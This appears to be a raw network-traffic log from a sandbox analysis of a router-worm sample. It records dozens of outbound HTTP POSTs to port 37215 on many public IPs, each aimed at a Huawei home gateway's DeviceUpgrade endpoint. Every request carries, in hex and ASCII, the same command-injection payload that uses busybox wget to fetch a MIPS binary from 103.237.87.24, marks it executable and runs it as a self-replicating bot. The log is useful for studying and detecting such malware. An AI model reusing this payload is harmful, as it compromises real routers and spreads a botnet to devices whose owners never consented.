3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2423192.168.2.1342850157.76.56.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625715971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2424192.168.2.134501697.22.79.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.628034115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2425192.168.2.1338072157.8.86.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.628035069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2426192.168.2.135818024.67.166.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.628099918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2427192.168.2.133425241.4.211.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.628103018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2428192.168.2.1339494128.211.213.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.628129959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2429192.168.2.1339896197.175.30.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.629374027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2430192.168.2.1352406204.217.5.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.629424095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2431192.168.2.1338368165.200.56.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.629455090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2432192.168.2.1344820154.123.59.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.629466057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2433192.168.2.1350744157.147.209.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.629539013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
